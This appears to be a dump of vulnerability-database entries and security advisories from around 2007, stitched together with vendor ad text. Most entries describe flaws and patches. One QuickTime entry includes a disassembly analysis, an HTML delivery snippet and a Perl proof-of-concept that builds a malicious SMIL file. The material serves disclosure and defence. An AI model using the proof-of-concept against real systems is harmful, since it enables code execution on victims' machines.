VARIoT IoT vulnerabilities database

Integer overflow in Apple Quicktime before 7.2 on Mac OS X 10.3.9 and 10.4.9 allows user-assisted remote attackers to execute arbitrary code via crafted (1) title and (2) author fields in an SMIL file, related to improper calculations for memory allocation. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities. Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. The Full Featured Secunia Network Software Inspector (NSI) is now available: http://secunia.com/network_software_inspector/ The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. ---------------------------------------------------------------------- TITLE: Apple QuickTime Multiple Vulnerabilities SECUNIA ADVISORY ID: SA26034 VERIFY ADVISORY: http://secunia.com/advisories/26034/ CRITICAL: Highly critical IMPACT: Exposure of sensitive information, DoS, System access WHERE: >From remote REVISION: 1.1 originally posted 2007-07-12 SOFTWARE: Apple QuickTime 7.x http://secunia.com/product/5090/ DESCRIPTION: Some vulnerabilities have been reported in Apple QuickTime, which can be exploited by malicious people to compromise a user's system. 1) An unspecified error exists in the processing of H.264 movies. 2) An unspecified error exists in the processing of movie files. 5) A design error exists in QuickTime for Java, which can be exploited to disable security checks and execute arbitrary code when a user visits a web site containing a specially crafted Java applet. 6) A design error exists in QuickTime for Java, which can be exploited to bypass security checks and read and write to process memory. 7) A design error exists in QuickTime for Java due to JDirect exposing interfaces that may allow loading arbitrary libraries and freeing arbitrary memory. 8) A design error exists in QuickTime for Java, which can be exploited to capture the user's screen content when a user visits a web site containing a specially crafted Java applet. QuickTime 7.2 for Mac: http://www.apple.com/support/downloads/quicktime72formac.html QuickTime 7.2 for Windows: http://www.apple.com/support/downloads/quicktime72forwindows.html PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Tom Ferris, Security-Protocols.com and Matt Slot, Ambrosia Software, Inc. 2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software. 3) The vendor credits Tom Ferris, Security-Protocols.com. 5, 6, 7) The vendor credits Adam Gowdiak. 8) Reported by the vendor. CHANGELOG: 2007-07-12: Added link to US-CERT. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=305947 iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556 OTHER REFERENCES: US-CERT VU#582681: http://www.kb.cert.org/vuls/id/582681 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA07-193A Apple Releases Security Updates for QuickTime Original release date: July 12, 2007 Last revised: -- Source: US-CERT Systems Affected Apple QuickTime on systems running * Apple Mac OS X * Microsoft Windows Overview Apple QuickTime contains multiple vulnerabilities. I. Description Apple QuickTime 7.2 resolves multiple vulnerabilities in the way Java applets and various types of media files are handled. Since QuickTime configures most web browsers to handle QuickTime media files, an attacker could exploit these vulnerabilities using a web page. Note that QuickTime ships with Apple iTunes. For more information, please refer to the Vulnerability Notes Database. For further information, please see the Vulnerability Notes Database. Solution Upgrade QuickTime Upgrade to QuickTime 7.2. On Microsoft Windows, QuickTime users can install the update by using the built-in auto-update mechanism, Apple Software Update, or by installing the update manually. Disabling QuickTime in your web browser may defend against this attack vector. For more information, refer to the Securing Your Web Browser document. Disabling Java in your web browser may defend against this attack vector. Instructions for disabling Java can be found in the Securing Your Web Browser document. References * Vulnerability Notes for QuickTime 7.2 - <http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72> * About the security content of the QuickTime 7.2 Update - <http://docs.info.apple.com/article.html?artnum=305947> * How to tell if Software Update for Windows is working correctly when no updates are available - <http://docs.info.apple.com/article.html?artnum=304263> * Apple QuickTime 7.2 for Windows - <http://www.apple.com/support/downloads/quicktime72forwindows.html> * Apple QuickTime 7.2 for Mac - <http://www.apple.com/support/downloads/quicktime72formac.html> * Standalone Apple QuickTime Player - <http://www.apple.com/quicktime/download/standalone.html> * Mac OS X: Updating your software - <http://docs.info.apple.com/article.html?artnum=106704> * Securing Your Web Browser - <http://www.us-cert.gov/reading_room/securing_browser/> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA07-193A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA07-193A Feedback VU#582681" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History Thursday July 12, 2007: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRpZsJ/RFkHkM87XOAQKLMgf9GpK/pbKTrSe0yKCRMt8Z4lMKl8VE+Rqr 4i8GfVXYUcBKbTlA8TTyf5ucbmCVAnjGJIq0W6X5gLBeA0QxCZ6qto/iPqviuvoV 8tu92/DuerYOkZMvJcn4RjAlMhM9CWCqJh1QG6R2Csn8AyeKEOFDiKYqoDzT+LoQ zojxmlNJIbUvIIGv8Z12Xkr1LLDmD4rs1nfDEBZm7yLTWRItmXpvSidftdUGETDZ +ok1SIhkZEbPNT7gAox9RZaKyIRHV7V4wZwqDd3weo6T7UPlhsgRqe88h1R5Yfq8 a7ePH0WSbTCqdGmuoM+nir4iDldoxB8OpbMUQH1nmWcDmc9xv++MHQ== =EV1X -----END PGP SIGNATURE----- . II. When parsing an SMIL file, arithmetic calculations can cause insufficient memory to be allocated. When copying in user-supplied data from the SMIL file, a heap-based buffer overflow occurs. This results in a potentially exploitable condition. III. This could be accomplished using a malicious SMIL file referenced from a website under the attacker's control. IV. Previous versions are suspected to be vulnerable. V. WORKAROUND iDefense is currently unaware of any effective workarounds for this vulnerability. VI. VENDOR RESPONSE Apple has released QuickTime 7.2 which resolves this issue. More information is available via Apple's QuickTime Security Update page at the URL shown below. http://docs.info.apple.com/article.html?artnum=305947 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-2394 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. CREDIT This vulnerability was reported to iDefense by David Vaartjes from ITsec Security Services http://www.itsec-ss.nl/. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright \xa9 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . iDefense confirmed the existence of this vulnerability in version 7.1.3 and 7.1.5 for Windows XP SP2 and Mac OS X also [1]. As QuickTime binaries for Windows XP and Vista are identical, this issue will affect QuickTime running on Windows Vista also. ---------------------------------------------------------------------- FIXED VERSIONS ---------------------------------------------------------------------- Apple has released QuickTime version 7.2 for Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista and Windows XP SP2 to address this issue. See [2] for additional information about this update. QuickTime 7.2 is not available for the Windows 2000 platform. Presumably, Apple dropped support for this platform. ---------------------------------------------------------------------- PRODUCT DESCRIPTION ---------------------------------------------------------------------- QuickTime is Apple's media player product. According to Apple, QuickTime is downloaded over 10 million times a month. According to Secunia, QuickTime is currently installed on over 50% of PCs [3]. The Synchronized MultiMedia Integration Language (SMIL) provides a high-level scripting syntax for describing multimedia presentations. SMIL files are text files that use XML-based syntax to specify what media elements to present and where and when to present them. This can be exploited to overflow that heap buffer with user supplied content, which eventually can result in the execution of arbitrary code. -- <smil> <head> <meta name="title" content="specific-length"/> <meta name="author" content="specific-length"/> </head> </smil> -- When such a SMIL file is parsed the length value of the author field is stored in a short int data type (16 bit) without bounds checking. In sub_66952B50(), this value is (sign) extended to a long int data type (32 bit). -- 66952C9A push eax 66952C9B call sub_668B57D0 66952CA0 --> movsx eax, word ptr [esp+2Ch+var_C] 66952CA5 mov edx, [esp+2Ch+arg_4] 66952CA9 lea ecx, [esp+2Ch+var_10] -- So, when the length of the author field is >= 0x8000 bytes, it will be extended to a length value between 0xffff8000 and 0xffffffff. Next, in sub_668DCFD0() the sign extended length of the author field is added to the length of the title field + 0x20: -- 668DD04D jnz short loc_668DD0A0 668DD04F test ebx, ebx 668DD051 jz loc_668DD1EB 668DD057 --> lea eax, [edi+ebx] // edi holds the length of // the title field + 0x20. // ebx holds the sign // extended length of the // author field. 668DD05A push eax 668DD05B push ecx -- In sub_668DCA60(), 4 is added to the result of the calculation: -- 668DCB37 test edi, edi 668DCB39 jz short loc_668DCB40 668DCB3B --> lea eax, [edi+4] // edi holds the result 668DCB3E jmp short loc_668DCB42 -- Next, in sub_668F5550() the final length value is used as the dwBytes argument in a call to HeapRealloc(): -- 668F555E push eax // dwBytes (user specified) 668F555F push ecx // lpMem 668F5560 push 1 // dwFlags 668F5562 push edx // hHeap 668F5563 --> call ds:HeapReAlloc -- This allows for the allocation of a controlled amount of memory. For example, when setting the length of the author field to 0xff00 (65280) and the length of the title field to 0xdf (223), the following situation occurs: 1: sub_66952B50(): 0x0000ff00 will be sign extended to 0xffffff00. 2: sub_668DCFD0(): 0x000000ff (0x000000df + 0x00000020) will be added to 0xffffff00 resulting in a length value of 0xffffffff. 3: sub_668DCA60(): 0x00000004 is added to 0xffffffff, resulting in a value of 0x00000003. 4: sub_668F5550(): HeapRealloc() will allocate 0x00000003 bytes of memory. Next, the pointer returned by HeapRealloc() is used by sub_668DCFD0() as the dest argument in a call to memcpy(): -- 668DD08E push ebx // count, length value right // after sign extension // (0xffffff00). 668DD08F push edx // src, buffer with user // supplied (author) content. 668DD090 add eax, esi 668DD092 --> push eax // dest, 3 byte buffer. 668DD093 call _memcpy 668DD098 add esp, 18h 668DD09B jmp loc_668DD1E5 -- This copy action will result in an overflow of the 3 byte heap buffer with data from the author field (user supplied). Due to the large amount of data written, this will finally result in an access violation when memory is read or written outside the heap page. The exception is handled by the program and execution continues with a corrupt heap. For my platform (win2k), when a call to HeapAlloc() is executed the unlink code of ntdll will "fail" because we have overwritten pointers in the heap management structures of other heap buffers with our data. The status of the registers during unlinking is: -- EAX 78787878 <-- user supplied ECX 78787878 <-- user supplied EDX 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx" EBX 00000078 ESP 0012EDC8 EBP 0012EF84 ESI 01200000 EDI 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx" -- -- 77f867e6 mov dword ptr ds:[ecx],eax 77f867e8 mov dword ptr ds:[eax+4],ecx -- The unlink instructions will result in the following exception: --------------------------- QuickTimePlayerMain: QuickTimePlayer.exe "The instruction at "0x77f867e6" referenced memory at "0x78787878". The memory could not be "written" --------------------------- This shows that we are able to overwrite 4 bytes anywhere in the address space of the process with "any" 4 byte value we want, which can for example be exploited to overwrite function pointers like the SEH or UEF to gain control of the process. This 4 byte overwrite via the unlink code does not apply to XPSP2 and W2K3 as "safe unlinking" is used on these platforms. ---------------------------------------------------------------------- ATTACK VECTORS ---------------------------------------------------------------------- This vulnerability can be triggered by luring a target user into running a malicious SMIL file locally or via a webpage. In the later scenario the OBJECT (IE) and/or EMBED (FireFox) tags can be used: <OBJECT CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab" WIDTH="10" HEIGHT="10" > <!-- malicious SMIL file --> <PARAM NAME="src" VALUE="poc.smil" /> <EMBED <!-- available .qtif or .mov file to start up QT for FF --> SRC="available-sample.qtif" <!-- malicious SMIL file --> QTSRC="poc.smil" WIDTH="10" HEIGHT="10" PLUGINSPAGE="www.apple.com/quicktime/download" TYPE="video/quicktime" /> </OBJECT> ---------------------------------------------------------------------- PROOF OF CONCEPT ---------------------------------------------------------------------- #!/usr/bin/perl -w #### # QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC # # Researched on QuickTime 7.1.3 on Windows 2000 SP4. # # David Vaartjes <d.vaartjes at gmail.com> #### $file = "poc.smil"; $padd = "x"; $cop_len = 36; #### # By choosing the following lengths the # integer overflow will be triggered. #### $tit_len = 223; $auth_len = 65280; open(FH,">$file") or die "Can't open file:$!"; print FH "<smil>\n". "<head>\n". " <meta name=\"title\" content=\"".$padd x $tit_len."\"/>\n". " <meta name=\"author\" content=\"".$padd x $auth_len."\"/>\n". " <meta name=\"copyright\" content=\"".$padd x $cop_len."\"/>\n". "</head>\n". "</smil>"; close(FH); ---------------------------------------------------------------------- REFERENCES ---------------------------------------------------------------------- [1] http://labs.idefense.com/intelligence/vulnerabilities/display.php? id=556 [2] http://docs.info.apple.com/article.html?artnum=305947 [3] http://secunia.com/blog/7/ ---------------------------------------------------------------------- DISCLOSURE TIMELINE ---------------------------------------------------------------------- 04/02/2007 Initial vendor notification (by iDefense) 04/09/2007 Initial vendor response 07/11/2007 Apple security bulletin & patches available 07/11/2007 Public disclosure of iDefense advisory 09/03/2007 Public disclosure of this advisory

WordPlugin in the wordintegration component in vtiger CRM before 5.0.3 allows remote authenticated users to bypass field level security permissions and merge arbitrary fields in an Email template, as demonstrated by the fields in the Contact module. vtiger CRM is prone to a remote security vulnerability

index.php in vtiger CRM before 5.0.3 allows remote authenticated users to obtain all users' names and e-mail addresses, and possibly change user settings, via a modified record parameter in a DetailView action to the Users module. NOTE: the vendor disputes the changing of settings, reporting that the attack vector results in a "You are not permitted to execute this Operation" error message in a 5.0.3 demo. vtiger CRM is prone to a denial-of-service vulnerability

The report module in vtiger CRM before 5.0.3 does not properly apply security rules, which allows remote authenticated users to read arbitrary private module entries. vtiger CRM is prone to a remote security vulnerability

vtiger CRM before 5.0.3 allows remote authenticated users to import and export the information for a contact even when they only have the View permission. vtiger CRM is prone to a remote security vulnerability

vtiger CRM before 5.0.3 allows remote authenticated users with access to the Analytics DashBoard menu to bypass data restrictions and read the pipeline of the entire organization, possibly involving modules/Potentials/Potentials.php. vtiger CRM is prone to a remote security vulnerability

SQL injection vulnerability in the dashboard (include/utils/SearchUtils.php) in vtiger CRM before 5.0.3 allows remote authenticated users to execute arbitrary SQL commands via the assigned_user_id parameter in a Potentials ListView action to index.php. vtiger CRM is prone to a sql-injection vulnerability

vtiger CRM before 5.0.3, when a migrated build is used, allows remote authenticated users to read certain other users' calendar activities via a (1) home page or (2) event list view. vtiger CRM is prone to a remote security vulnerability

index.php in vtiger CRM before 5.0.3 allows remote authenticated users to perform administrative changes to arbitrary profile settings via a certain profilePrivileges action in the Users module. vtiger CRM is prone to a denial-of-service vulnerability

The SOAP webservice in vtiger CRM before 5.0.3 does not ensure that authenticated accounts are active, which allows remote authenticated users with inactive accounts to access and modify data, as demonstrated by the Thunderbird plugin. vtiger CRM is prone to a remote security vulnerability

Internet Communication Manager (aka ICMAN.exe or ICM) in SAP NetWeaver Application Server 6.x and 7.x, possibly only on Windows, allows remote attackers to cause a denial of service (process crash) via a URI of a certain length that contains a sap-isc-key parameter, related to configuration of a web cache. Internet Communication Manager is prone to a remote denial-of-service vulnerability. A remote attacker can exploit this issue to cause the affected service to crash, effectively denying service to legitimate users. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. The Full Featured Secunia Network Software Inspector (NSI) is now available: http://secunia.com/network_software_inspector/ The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. The vulnerability is caused due to an error within the Internet Communication Manager (ICM - ICMAN.exe) component and can be exploited to crash the ICM process by requesting an overly long (around 264 bytes), specially crafted URI. SOLUTION: Update to the latest version. PROVIDED AND/OR DISCOVERED BY: Mark Litchfield, NGSSoftware ORIGINAL ADVISORY: http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-internet-communication-manager-dos/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cross-domain vulnerability in Apple Safari for Windows 3.0.2 allows remote attackers to bypass the Same Origin Policy and access restricted information from other domains via JavaScript that overwrites the document variable and statically sets the document.domain attribute to a file:// location, a different vector than CVE-2007-3482. Safari For Windows is prone to a security bypass vulnerability

Cross-site request forgery (CSRF) vulnerability in pop/WizU.html in the management interface in Check Point VPN-1 Edge X Embedded NGX 7.0.33x on the Check Point VPN-1 UTM Edge allows remote attackers to perform privileged actions as administrators, as demonstrated by a request with the swuuser and swupass parameters, which adds an administrator account. NOTE: the CSRF attack has no timing window because there is no logout capability in the management interface. Vpn-1 Utm Edge is prone to a cross-site request forgery vulnerability. A remote attacker can perform privileged operations as an administrator, for example, requesting swuuser and swupass parameters can increase the administrator account

The Intel Core 2 Extreme processor X6800 and Core 2 Duo desktop processor E6000 and E4000 incorrectly set the memory page Access (A) bit for a page in certain circumstances involving proximity of the code segment limit to the end of a code page, which has unknown impact and attack vectors on certain operating systems other than OpenBSD, aka AI90. (A) There are vulnerabilities that are unspecified because they set the bits incorrectly.It may be affected unspecified. Intel Core 2 processors are prone to multiple local denial-of-service vulnerabilities. Attackers can exploit these issues to deny service to legitimate users. Intel CORE 2 is a very popular dual-core processor. Multiple denial of service vulnerabilities exist in CORE 2 processors: If the temperature reaches an invalid temperature, the CPU will not generate a Thermal interrupt even if the set threshold has been exceeded; during the execution of a series of REP store instructions, the store may be Attempts to allocate memory before completing the instruction, resulting in processor lockup and/or system hang; if one logical processor writes to a non-dirty page, another logical processor writes to the same non-dirty page or If the dirty bit is explicitly set in the page table entry of the core, the complex interaction of internal processor behavior can cause unpredictable system behavior and hang; if requesting data from Core 1 causes the L1 cache to be missed, the request will be sent to the L2 cache. If the request encounters a modified line in Core 2's L1 data cache, certain internal requests may cause incorrect data to be returned to Core 1. #PF code may be mishandled if: 1 PDE is modified without validating the relevant TLB entry 2 Code execution diverts to a different code page that satisfies both of the following conditions: * The target linear address is equal to the modified PDE * The PTE of the target linear address contains an explicit A (Accessed) bit 3 One of the following simultaneous exceptions occurs after code diversion: * #DB code and #PF code* Segmentation limit violation #GP code and #PF code software It can be seen that the #PF code is incorrectly processed before the segmentation fault destroys the #GP code, or the #PF code is processed instead of the #DB code

Cross-domain vulnerability in Apple Safari for Windows 3.0.1 allows remote attackers to bypass the "same origin policy" and access restricted information from other domains via JavaScript that overwrites the document variable and statically sets the document.domain attribute. Apple Safari is prone to a vulnerability that permits an attacker to bypass the same-origin policy. A successful exploit may allow the attacker to access properties of the targeted domain or aid in spoofing content. This may allow the attacker to steal potentially sensitive information or launch other attacks. This issue affects Apple Safari 3.01; other versions may also be affected. JavaScript overrides document variables and statically sets the document.domain property

Heap-based buffer overflow in the viewer ActiveX control in Sony Network Camera SNC-RZ25N before 1.30; SNC-P1 and SNC-P5 before 1.29; SNC-CS10 and SNC-CS11 before 1.06; SNC-DF40N and SNC-DF70N before 1.18; SNC-RZ50N and SNC-CS50N before 2.22; SNC-DF85N, SNC-DF80N, and SNC-DF50N before 1.12; and SNC-RX570N/W, SNC-RX570N/B, SNC-RX550N/W, SNC-RX550N/B, SNC-RX530N/W, and SNC-RX530N/B 3.00 and 2.x before 2.31; allows remote attackers to execute arbitrary code via a long first argument to the PrmSetNetworkParam method. The ActiveX Control for Sony SNC series network cameras is a software to monitor images over the network using a web browser. Failed exploit attempts likely result in denial-of-service conditions. ---------------------------------------------------------------------- Did you know? Our assessment and impact rating along with detailed information such as exploit code availability, or if an updated patch is released by the vendor, is not part of this mailing-list? Click here to learn more about our commercial solutions: http://secunia.com/advisories/business_solutions/ Click here to trial our solutions: http://secunia.com/advisories/try_vi/ ---------------------------------------------------------------------- TITLE: Sony Network Camera ActiveX Control Buffer Overflow Vulnerability SECUNIA ADVISORY ID: SA33968 VERIFY ADVISORY: http://secunia.com/advisories/33968/ DESCRIPTION: A vulnerability has been reported in the Sony Network Camera ActiveX control, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an unspecified error and can be exploited to cause a buffer overflow. Successful exploitation may allow execution of arbitrary code. Please see vendor advisory for a list of products and firmware versions that include the affected ActiveX control. SOLUTION: Update to a fixed version. See vendor advisory for more details. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: Sony: http://www.sony.jp/professional/News/info/pb20090223.html OTHER REFERENCES: JVN: http://jvn.jp/jp/JVN16767117/index.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Multiple cross-site scripting (XSS) vulnerabilities in setup.cgi on the Cisco Linksys WAG54GS Wireless-G ADSL Gateway with 1.00.06 firmware allow remote attackers to inject arbitrary web script or HTML via the (1) c4_trap_ip_, (2) devname, (3) snmp_getcomm, or (4) snmp_setcomm parameter. (1) c4_trap_ip_ Parameters (2) devname Parameters (3) snmp_getcomm Parameters (4) snmp_setcomm Parameters. Attackers may exploit this issue by enticing victims into opening a malicious URI. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may help the attacker steal cookie-based authentication credentials, cause denial-of-service conditions, and launch other attacks. Successful exploits will allow script code to be stored persistently in the affected device. Linksys Wireless-G ADSL Gateway WAG54GS running firmware V1.00.06 is reported vulnerable. Linksys WAG54GS is a wireless ADSL router launched by Cisco. Linksys WAG54GS has an input validation vulnerability when processing user requests. If an attacker visits the router's configuration page and submits a malicious HTTP request, a cross-site scripting attack can be performed. ---------------------------------------------------------------------- 2003: 2,700 advisories published 2004: 3,100 advisories published 2005: 4,600 advisories published 2006: 5,300 advisories published How do you know which Secunia advisories are important to you? The Secunia Vulnerability Intelligence Solutions allows you to filter and structure all the information you need, so you can address issues effectively. Get a free trial of the Secunia Vulnerability Intelligence Solutions: http://corporate.secunia.com/how_to_buy/38/vi/?ref=secadv ---------------------------------------------------------------------- TITLE: Linksys WAG54GS Cross-Site Scripting and Cross-Site Request Forgery Vulnerabilities SECUNIA ADVISORY ID: SA27738 VERIFY ADVISORY: http://secunia.com/advisories/27738/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: >From remote OPERATING SYSTEM: Linksys WAG54GS Wireless-G ADSL Gateway with SpeedBooster 1.x http://secunia.com/product/16625/ DESCRIPTION: Adrian Pastor has reported some vulnerabilities in Linksys WAG54GS, which can be exploited by malicious people to conduct cross-site scripting and cross-site request forgery attacks. 1) Input passed to the "devname", "snmp_getcomm", "snmp_setcomm", and "c4_trap_ip_" parameters in setup.cgi is not properly sanitised before being returned to the user. 2) The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the request. This can be exploited to e.g. perform certain administrative actions by enticing a logged-in administrator to visit a malicious site. The vulnerabilities are reported in firmware version 1.00.06. Other versions may also be affected. SOLUTION: Vulnerability #1 has reportedly been fixed in firmware version 1.01.03. Do not browse untrusted websites or follow untrusted links while logged on to the device. PROVIDED AND/OR DISCOVERED BY: Adrian Pastor ORIGINAL ADVISORY: http://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-g-adsl-gateway-with-speedbooster-wag54gs ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Format string vulnerability in the Aastra 9112i SIP Phone with firmware 1.4.0.1048 and boot version 1.1.0.10 allows remote attackers to cause a denial of service (blocked call reception and slow calling) via format string specifiers in an SDP header value, a different vulnerability than CVE-2007-3349. Aastra 9112i SIP Phone There is a service disruption ( Call rejection and delayed call ) There is a vulnerability that becomes a condition

Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified. When Hitachi Web Server receives a request that contains malicious scripts, they are inserted into the server-satus page the Server automatically creates. This allows the inserted malicious scripts to be executed on the client machines. The vulnerability does not affect the product if the server-status reporting feature is disabled.An attacker could execute malicious scripts. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. This could lead to a denial of service if using a threaded MPM (CVE-2007-1863). A local attacker with the ability to run scripts on the server could manipulate the scoreboard and cause arbitrary processes to be terminated (CVE-2007-3304). Updated packages have been patched to prevent the above issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5752 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1863 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3304 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: 5f906bba3e1195f5ffbc3fcb2a6bde38 2007.0/i586/apache-base-2.2.3-1.1mdv2007.0.i586.rpm 83a4844cd98ef203958796ce280a71b2 2007.0/i586/apache-devel-2.2.3-1.1mdv2007.0.i586.rpm 2a6853cad61ca0548715486c5d4c8a23 2007.0/i586/apache-htcacheclean-2.2.3-1.1mdv2007.0.i586.rpm bebbc850c030be2ef87ce12d420fb825 2007.0/i586/apache-mod_authn_dbd-2.2.3-1.1mdv2007.0.i586.rpm 9e08e4738b304aab4f90f4f18aa5da45 2007.0/i586/apache-mod_cache-2.2.3-1.1mdv2007.0.i586.rpm 989d0538f7882277053f6d4c89ca581c 2007.0/i586/apache-mod_dav-2.2.3-1.1mdv2007.0.i586.rpm c1c0fc53dd811dd6176800226574efbf 2007.0/i586/apache-mod_dbd-2.2.3-1.1mdv2007.0.i586.rpm e68509c01d66b9d42e676e7974360154 2007.0/i586/apache-mod_deflate-2.2.3-1.1mdv2007.0.i586.rpm 5596cb5359b7919125fc10be83598445 2007.0/i586/apache-mod_disk_cache-2.2.3-1.1mdv2007.0.i586.rpm d71b54240667224fd7da7fec4693c30b 2007.0/i586/apache-mod_file_cache-2.2.3-1.1mdv2007.0.i586.rpm 3571cab041e622f9399c57f377ac3fe3 2007.0/i586/apache-mod_ldap-2.2.3-1.1mdv2007.0.i586.rpm 598fdd7aad80fdc557142c5e9fc00677 2007.0/i586/apache-mod_mem_cache-2.2.3-1.1mdv2007.0.i586.rpm f4ec774478f5d198ad2e3d3384a5ad83 2007.0/i586/apache-mod_proxy-2.2.3-1.1mdv2007.0.i586.rpm ab7726290be59f03a5ade2029a2b02f8 2007.0/i586/apache-mod_proxy_ajp-2.2.3-1.1mdv2007.0.i586.rpm d72ab4173d51da4a0c1df63dbb52ccf5 2007.0/i586/apache-mod_ssl-2.2.3-1.1mdv2007.0.i586.rpm fcde0ec8b64d83402b53f926ec7fa835 2007.0/i586/apache-mod_userdir-2.2.3-1.1mdv2007.0.i586.rpm 58a0628d42d23c9aa5df6567789fad40 2007.0/i586/apache-modules-2.2.3-1.1mdv2007.0.i586.rpm 011487e1afdfb400419303182e5320c7 2007.0/i586/apache-mpm-prefork-2.2.3-1.1mdv2007.0.i586.rpm 7a755b22020153b44f8d00ba153d3d97 2007.0/i586/apache-mpm-worker-2.2.3-1.1mdv2007.0.i586.rpm ef6e11f0d26db492bc9fe83a2dbf53d7 2007.0/i586/apache-source-2.2.3-1.1mdv2007.0.i586.rpm 411b90e42ed304f329e9989d64a9dfc5 